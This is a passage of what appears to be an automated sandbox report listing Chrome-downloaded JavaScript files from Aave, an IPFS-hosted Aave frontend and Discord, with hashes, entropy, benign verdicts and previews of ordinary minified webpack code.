                                                                                                                                                                                                                                                  SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
                                                                                                                                                                                                                                                  MD5:7C3F7E060745668041278118C0BB3D6D
                                                                                                                                                                                                                                                  SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
                                                                                                                                                                                                                                                  SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
                                                                                                                                                                                                                                                  SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/ZcUTDKp_rDmFKouqSkKwt/_middlewareManifest.js
                                                                                                                                                                                                                                                  Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (36944), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):36944
                                                                                                                                                                                                                                                  Entropy (8bit):4.339531441659292
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:7tzFf8wXDlyklTD+IxPNCg52LWR0Y4QD+2tq+9kg4L6hWXPyJ7s62DnjVVtJ/V3a:RzFbXdlxPNCO2LWqHQDIm0/y5SDnjbs
                                                                                                                                                                                                                                                  MD5:C6B77C13893CC787E7115D4FC7998E77
                                                                                                                                                                                                                                                  SHA1:DAD08C4D833D7C5268D467BEF0782F4645AEB491
                                                                                                                                                                                                                                                  SHA-256:4F166C03F8C6AD6060636D4D24154A0BD8511EA14CEF8195AB65D77173AD8D23
                                                                                                                                                                                                                                                  SHA-512:8741587FF9E77E765BF6AB94485DDC30BAFDB2F79904F66E58240CFA28FD89D8E319301188A3203DCD8CBE5FF1687917BE01B99227D29689F4F03052913CE978
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/5599-221be466b9fcb06f.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5599],{5209:function(a,c,e){var t,l,n,r,i,s,o=e(67294);function f(){return f=Object.assign?Object.assign.bind():function(a){for(var c=1;c<arguments.length;c++){var e=arguments[c];for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(a[t]=e[t])}return a},f.apply(this,arguments)}c.Z=function(a){return o.createElement("svg",f({width:135,height:163,viewBox:"0 0 135 163",fill:"none",xmlns:"http://www.w3.org/2000/svg"},a),o.createElement("g",{clipPath:"url(#loveGhost_svg__a)"},t||(t=o.createElement("circle",{cx:67.788,cy:95.034,r:66.078,transform:"rotate(19.923 67.788 95.034)",fill:"url(#loveGhost_svg__b)",stroke:"#000"})),o.createElement("mask",{id:"loveGhost_svg__c",style:{maskType:"alpha"},maskUnits:"userSpaceOnUse",x:2,y:29,width:132,height:132},l||(l=o.createElement("circle",{cx:67.786,cy:95.035,r:65.578,transform:"rotate(19.923 67.786 95.035)",fill:"#fff"}))),n||(n=o.createElement("g",{mask:"url(#loveGhost_svg__
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18405), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):18405
                                                                                                                                                                                                                                                  Entropy (8bit):5.439761220620952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:2f41yRfPreQYWW+rFNfCpXxRMvQUbsMpAPX5Qz2U86tEIGmcpDdql+JxPziABTkF:JvWPrjC55gAPpMZ8P+SkJ1so
                                                                                                                                                                                                                                                  MD5:A8940D40A47213A0BEEEC5FF547A0954
                                                                                                                                                                                                                                                  SHA1:D09AB9E6D669255C061EB3AE67618EA39207B160
                                                                                                                                                                                                                                                  SHA-256:1F6A8DDDFF1226DEEFB521E86F91C16D5FDFA9BF82C178F4EDC89FD104A150E2
                                                                                                                                                                                                                                                  SHA-512:14A94F43E01AE6BE2CA0381F78E5972C74B33FE8570F711D56E670217F93FD9C1504684488E3BA042ABFE6881A86BA1F8719D4498094BAAF5115A6FBEF033A1B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4254],{35643:function(e,t,r){r.d(t,{g:function(){return D}});var n=r(17674),a=r(80854),i=r(1279),o=r(62753),s=r(9144),c=r(30120),u=r(90149),l=r(56371),d=r(67294),p=r(59499),f=r(36864),v=r(49501),x=r(57609),h=r(58527),b=r(85893);function g(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function m(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?g(Object(r),!0).forEach((function(t){(0,p.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):g(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var y=function(e){var t=(0,f.Z)({},e);return(0,b.jsx)(h.G,m(m({event:{eventName:x.vh.TOOL_TIP,eventParams:{tooltip:"Gas C
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18134)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):18183
                                                                                                                                                                                                                                                  Entropy (8bit):5.745314379390206
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:M7Qek/HNfVFGOSH4vgk+l/HyHOC7CmA5h4m4C2xYtL5c29Jd0KkBijYpthFDv2Pl:gQek/7VwEgkK/SuC7Cx5G1C2xYtL5c2b
                                                                                                                                                                                                                                                  MD5:0484A49ECB98E68AC141261F03571012
                                                                                                                                                                                                                                                  SHA1:BD0FE8929907033D0E0C51485389EFEC3C911975
                                                                                                                                                                                                                                                  SHA-256:0F3FF527630775D2733027371E91F7E0DF45917014FF42E26BD1556694A01987
                                                                                                                                                                                                                                                  SHA-512:22B68BEEABC680C32EC491A58A46754E36A5CB6ED5A9C90F23EE4870EC7570D5F44DE43A9B377C0909B0665005D6A5283A928235AA5A9311126DE13C4BC91F7A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["10778"],{418757:function(e){e.exports="/assets/b7d1dc6b0746101719c5.png"},494207:function(e){e.exports="/assets/85153fe71873da0f5802.svg"},320440:function(e){e.exports="/assets/4676f063fb9f129e9fdb.svg"},561030:function(e){e.exports="/assets/75c80c4160a66983ae66.svg"},419185:function(e){e.exports="/assets/47e72e6360ce185adab6.svg"},826806:function(e){e.exports="/assets/fb418059f41b569abca4.svg"},123013:function(e){e.exports="/assets/98cacc492d985565ed4f.png"},540909:function(e){e.exports="/assets/2a5176cf2bd0ccdf0e7b.svg"},232454:function(e){e.exports="/assets/ad2027f11792ba8c0e7f.svg"},526916:function(e){e.exports="/assets/f38b6aefa24dc9a54765.svg"},29654:function(e){e.exports="/assets/dde11474b0623b723861.svg"},820160:function(e,s,a){a.d(s,{Z:function(){return L}});var E=a(735250);a(470079);var _=a(481060),t=a(813197),n=a(689938),r=a(510186);function L(e){let{icon:s,onChange:a}=e;return(0,E.jsx)(_.Fo
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50864), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):50864
                                                                                                                                                                                                                                                  Entropy (8bit):5.3522605432239265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:TjDORnGYYk6RRmDsQWFkkCCU+N+BPiYHWdcy0r51/5HIkcstelT8wO2422nDzUrZ:XwsBiB6HtMqst4Q32GDzf/jyMo
                                                                                                                                                                                                                                                  MD5:1034A0DE7FBC269CCFC9DDBA4AA147EC
                                                                                                                                                                                                                                                  SHA1:DE3DB06BD3FD7926CE07F376978E87924D0302D8
                                                                                                                                                                                                                                                  SHA-256:EB65666971304741EB5BE24D3F0A19071CB2F6B6A9D4AB8E02C5FDA397B25B85
                                                                                                                                                                                                                                                  SHA-512:4806163B04146C031B8D2AF76A58AFDE313B2D5D68308F85803BE0C5C5EC1E91B318327502863ACF17C32B552EB5FBDD4ED4D8F57AFA491875267F244998BD6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2284],{36919:function(t,e,n){"use strict";var r=n(51833);function i(t,e){for(var n in e)o(e,n)&&(t[n]=e[n])}function o(t,e){return Object.prototype.hasOwnProperty.call(t,e)}t.exports=function(t){r(t)||(t={});for(var e=arguments.length,n=1;n<e;n++){var o=arguments[n];r(o)&&i(t,o)}return t}},9675:function(t,e,n){"use strict";const r=n(33596),i=n(21006),o=n(45294),a=n(9809),s=n(38497),c=n(86378),u=n(28181),l=n(79254),p=n(55707);function f(t,e){if(""===t)return{data:{},content:t,excerpt:"",orig:t};let n=u(t);const r=f.cache[n.content];if(!e){if(r)return n=Object.assign({},r),n.orig=r.orig,n;f.cache[n.content]=n}return function(t,e){const n=o(e),r=n.delimiters[0],a="\n"+n.delimiters[1];let c=t.content;n.language&&(t.language=n.language);const u=r.length;if(!p.startsWith(c,r,u))return s(t,n),t;if(c.charAt(u)===r.slice(-1))return t;c=c.slice(u);const d=c.length,h=f.language(c,n);h.name&&(t.language=h.name,c=c.slice(h.raw.length));let g=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5833), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):5833
                                                                                                                                                                                                                                                  Entropy (8bit):5.413755638742764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:2LKFASmej5Mb8yET+ppvEVz9ufifqcvpnJ6I8G29XyYU5TzYimtYimuOcT:2+xvj5Mb89+DvEVpQyJWpCYUZzYxYq
                                                                                                                                                                                                                                                  MD5:1F65E9C87A2972BA79736481845E781F
                                                                                                                                                                                                                                                  SHA1:D7A695F8F2D062E8A16D578DAE357FE62A2658F6
                                                                                                                                                                                                                                                  SHA-256:1751B3188F9C8A4A21938D83EA30DAA9244319E5BC24C1132E704F2226D74C2B
                                                                                                                                                                                                                                                  SHA-512:80E21965E501B4844A400B6C648203F410716B0E7446242940F3D5BE7B337ED634DF7342598359B868AB900EB95FBC50CBCD02F10A0AFF9C57F63F766049BE9A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/4245-42e3ee29ff341df5.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4245],{9144:function(t,e,n){"use strict";var r=n(63366),o=n(87462),i=n(67294),c=n(95408),u=n(98700),a=n(39707),s=n(59766),f=n(81719),l=n(78884),v=n(85893);const p=["component","direction","spacing","divider","children"];function d(t,e){const n=i.Children.toArray(t).filter(Boolean);return n.reduce(((t,r,o)=>(t.push(r),o<n.length-1&&t.push(i.cloneElement(e,{key:`separator-${o}`})),t)),[])}const m=(0,f.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(t,e)=>[e.root]})((({ownerState:t,theme:e})=>{let n=(0,o.Z)({display:"flex",flexDirection:"column"},(0,c.k9)({theme:e},(0,c.P$)({values:t.direction,breakpoints:e.breakpoints.values}),(t=>({flexDirection:t}))));if(t.spacing){const r=(0,u.hB)(e),o=Object.keys(e.breakpoints.values).reduce(((e,n)=>(("object"===typeof t.spacing&&null!=t.spacing[n]||"object"===typeof t.direction&&null!=t.direction[n])&&(e[n]=!0),e)),{}),i=(0,c.P$)({values:t.direction,base:o}),a=(0,c.P$)({values:t.spac
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):71691
                                                                                                                                                                                                                                                  Entropy (8bit):5.290566318478528
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:O2uB0DdnFpVMQfuhkGT0iCfWXRFGY+9Ti:OAVm6GT0BuhFSTi
                                                                                                                                                                                                                                                  MD5:9612DEE64A8F3AD04BC68825DE164872
                                                                                                                                                                                                                                                  SHA1:A209961210B29D86F200EB7F70550EF2BFF17EF5
                                                                                                                                                                                                                                                  SHA-256:B18A7EC622A23BDDD75CA937CDD0DFA384F3AA1C5D276CBFAB59776F77CAAA1B
                                                                                                                                                                                                                                                  SHA-512:7D097E25A903F850A5A627842C377ECE5B270D9AF40237A6AECFD9E232BB9856BF6AE5AEF62236790BEBC2576E1F53245DFD66AD6DE08E3E05DD5D7BA6BB97BE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/29107295.4a69275373f23f88.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3662],{96486:function(n,t,r){var e;n=r.nmd(n),function(){var u,i="Expected a function",o="__lodash_hash_undefined__",f="__lodash_placeholder__",a=16,c=32,l=64,s=128,h=256,p=1/0,v=9007199254740991,_=NaN,g=4294967295,y=[["ary",s],["bind",1],["bindKey",2],["curry",8],["curryRight",a],["flip",512],["partial",c],["partialRight",l],["rearg",h]],d="[object Arguments]",b="[object Array]",w="[object Boolean]",m="[object Date]",x="[object Error]",j="[object Function]",A="[object GeneratorFunction]",k="[object Map]",O="[object Number]",I="[object Object]",E="[object Promise]",R="[object RegExp]",z="[object Set]",S="[object String]",C="[object Symbol]",W="[object WeakMap]",L="[object ArrayBuffer]",U="[object DataView]",B="[object Float32Array]",T="[object Float64Array]",$="[object Int8Array]",D="[object Int16Array]",N="[object Int32Array]",M="[object Uint8Array]",F="[object Uint8ClampedArray]",P="[object Uint16Array]",q="[object Uint32Array]
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17873), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17873
                                                                                                                                                                                                                                                  Entropy (8bit):5.550287362084471
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:lyPmJ0O3//4buQI6nPQH2P4C+KB+/mpAgVDmBLVNxx:lyP40OobR3nP5qmpAgpO/xx
                                                                                                                                                                                                                                                  MD5:2E91687C54457973E02DCAD3A6EE9762
                                                                                                                                                                                                                                                  SHA1:4D902F55AA2842CBEEEA5BE2FC48A05745609FAC
                                                                                                                                                                                                                                                  SHA-256:8D5B5E38BEC688DF3F6D8AB57081E8C32B3BA939A0A36640BA184A8DC04C0AF9
                                                                                                                                                                                                                                                  SHA-512:B2FEFB4E56E04F761C3941F1339708520A7F8C1B8FFC6235CF343C47B9827677392549F5B231808B5441D598346C8E903DB91086C94253662AEC8E98E7093D2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9447],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var i=n(t(64938)),o=t(85893),s=(0,i.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=s},9144:function(e,r,t){var n=t(63366),i=t(87462),o=t(67294),s=t(95408),a=t(98700),c=t(39707),l=t(59766),d=t(81719),u=t(78884),x=t(85893);const h=["component","direction","spacing","divider","children"];function m(e,r){const t=o.Children.toArray(e).filter(Boolean);return t.reduce(((e,n,i)=>(e.push(n),i<t.length-1&&e.push(o.cloneElement(r,{key:`separator-${i}`})),e)),[])}const v=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29762), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):29762
                                                                                                                                                                                                                                                  Entropy (8bit):5.546603560650734
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:zyPkWVecfOFulmjehCsF9vb6C8Sel+dCjuvho:aeTF5ehCu8QC3
                                                                                                                                                                                                                                                  MD5:F906CF385CDEB9914B7895D6C0A8323E
                                                                                                                                                                                                                                                  SHA1:52D0B3EC9CFB5E018BBC3071042EE07C1E705647
                                                                                                                                                                                                                                                  SHA-256:021E92EEC50B6BB51C5AA3C87914BD5F95CC92303801A2CADCD73F8113A8FEC9
                                                                                                                                                                                                                                                  SHA-512:4B9ED7788AF2EBDA07E0A0F800D85173FF7CE6B3DAB42A97F43F70D793D8E961D6289D7C11778F53473314B60EE74F0601813A4676B987B51CE4939DC572C160
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[501],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8048), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):8048
                                                                                                                                                                                                                                                  Entropy (8bit):5.347704777959417
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:FAwjeDDa0quSyj+fFPSDNU69gNHXUpZPWLM8EB8B2HqWenY:FiDO0qNt5UNU69gNHXo/O1rY
                                                                                                                                                                                                                                                  MD5:E1D081540AD13E71ECB22AE80793C0CA
                                                                                                                                                                                                                                                  SHA1:24638E61335E3FDE596BA1B4C0A40FB6B774DAAC
                                                                                                                                                                                                                                                  SHA-256:DCE7FD867A38FA67E6769469CBDB9B335E7C6FE6B40FA83E87397559C338268D
                                                                                                                                                                                                                                                  SHA-512:A5F3AE403582FF2FA9692AE3F65F633DD0EF45F1177F0BD190A09C426FD6F9AA304A370CB4CE4EDAE57F5A4B7AB427A035F2C6C6F53556F9C73052173A7C9EF9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1506-405d1202a4254f54.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1506],{64288:function(e,t,o){o.d(t,{Z:function(){return y}});var r=o(63366),a=o(87462),i=o(67294),n=o(86010),s=o(28320),d=o(34867),l=o(94780),c=o(29628),u=o(13264),p=o(66500),m=o(85893);const h=["className","component","disableGutters","fixed","maxWidth","classes"],f=(0,p.Z)(),g=(0,u.Z)("div",{name:"MuiContainer",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:o}=e;return[t.root,t[`maxWidth${(0,s.Z)(String(o.maxWidth))}`],o.fixed&&t.fixed,o.disableGutters&&t.disableGutters]}}),b=e=>(0,c.Z)({props:e,name:"MuiContainer",defaultTheme:f});var v=o(36622),x=o(81719),Z=o(78884);const R=function(e={}){const{createStyledComponent:t=g,useThemeProps:o=b,componentName:c="MuiContainer"}=e,u=t((({theme:e,ownerState:t})=>(0,a.Z)({width:"100%",marginLeft:"auto",boxSizing:"border-box",marginRight:"auto",display:"block"},!t.disableGutters&&{paddingLeft:e.spacing(2),paddingRight:e.spacing(2),[e.breakpoints.up("sm")]:{paddingLeft
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11118)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11167
                                                                                                                                                                                                                                                  Entropy (8bit):5.53404314133428
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:YLQA29dyFDfqM+eYTlPT06FJLliKriLZcrOWD8yLgkT06oGLBrOhzuM:Gazsql1/4gJGzf
                                                                                                                                                                                                                                                  MD5:DFD13C3F89CC1CDA9DA23A9D33ADD2F6
                                                                                                                                                                                                                                                  SHA1:A5D8AE2CE5C6E94D8A87E88EB1A30D723310A46F
                                                                                                                                                                                                                                                  SHA-256:AB75EB115154D73E0456028F7E035B5102121FE0E6CF4EB5BCF9863BF0BBAF5F
                                                                                                                                                                                                                                                  SHA-512:AAF274A209CB9598756AC33620065A875D199309E7E5A816A0BD6B89755B233B14A63E03E79DBB53951C77ECC39287B098B2267FCA1DECC639BC57F558024322
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["52030"],{48550:function(e,t,s){s.d(t,{P:function(){return l}});var n=s(689938);let l={get webauthn(){return n.Z.Messages.MFA_V2_WEBAUTHN_NAME},get totp(){return n.Z.Messages.MFA_V2_TOTP_NAME},get sms(){return n.Z.Messages.MFA_V2_SMS_NAME},get password(){return n.Z.Messages.MFA_V2_PASSWORD_NAME},get backup(){return n.Z.Messages.MFA_V2_BACKUP_NAME}}},124860:function(e,t,s){s.d(t,{Cd:function(){return f},YR:function(){return S}}),s(47120),s(411104);var n=s(735250),l=s(470079),i=s(481060),r=s(447097),o=s(873124),a=s(248902),d=s(160511),u=s(51693),c=s(973810),h=s(689938);function f(e){var t,s;let{mfaChallenge:h,mfaFinish:f,onEarlyClose:m,onClose:S,width:_=440}=e,[g,x]=l.useState(null!==(s=null===(t=h.methods[0])||void 0===t?void 0:t.type)&&void 0!==s?s:"select"),[E,C]=l.useState(g),p=async e=>{let{mfaType:t,data:s}=e;await f({mfaType:t,data:s,ticket:h.ticket}),null!=S&&S()},v={mfaChallenge:h,finish:p,setSli
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40104), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):40104
                                                                                                                                                                                                                                                  Entropy (8bit):5.52276425201366
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:ZyPKeF+pHuVecXWp+K8FPTmHNhCsmb1rth+Hbx5yh/KjnTKbQ:Xr4ezEWNhC71A
                                                                                                                                                                                                                                                  MD5:1C85DC354F6107073E9F7EA45BE17BF8
                                                                                                                                                                                                                                                  SHA1:732FEE8E415A3AE05ED3EF8476ED02C30F3D0DC2
                                                                                                                                                                                                                                                  SHA-256:4D4AAD34AF0F6B17306CCCC1BDA3E49A276AACE7E8839EA7498E153C1B5E0DE7
                                                                                                                                                                                                                                                  SHA-512:84C0A4A5A99F9D6B8899020A1D5EE75631948799C343F93CB340303B92A839309E3327BAD3DD65E761016FE66E59705D4426CEC0F31216B81DA5F4341D63F6C5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9522.ed3f6cd8a99af04d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9522],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),a=n(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},89722:function(e,t,n){n.d(t,{Z:function(){return h}});var r=n(87462),o=n(63366),a=n(67294),i=n(86010),s=n(94780),c=n(81719),l=n(78884),u=n(36622),d=n(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,n(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=n(85893);const f=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13325)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):13374
                                                                                                                                                                                                                                                  Entropy (8bit):5.33229367944175
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:c9jPMDYeG0dPbPDjzw4WDhiElYrskCLdHWQBC7dr1m+8LBpDtOnyUotvLfQE2u:c9jPMRLjZ0usbxwdr1QBpDtOy3JT
                                                                                                                                                                                                                                                  MD5:D0C788B157FF96A2DD902C97BFC889F6
                                                                                                                                                                                                                                                  SHA1:6CDE0BD611B34B15CA15437CA5AC4F77DE01ADA8
                                                                                                                                                                                                                                                  SHA-256:05A00FBAFFC4A7254C9B631FF0E81BE546DC275BE1D6F992C36849222D0B73F7
                                                                                                                                                                                                                                                  SHA-512:170615E3DE829D517662BE32C762B76B013163FA040C2EEDF89C865A9CEE1CEEDA7EE305BE27CD3A724832571A94B5A26FB3BB9D9A1D1C5386081F206A1E1436
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/5067a2ec1b24a6de868c.js
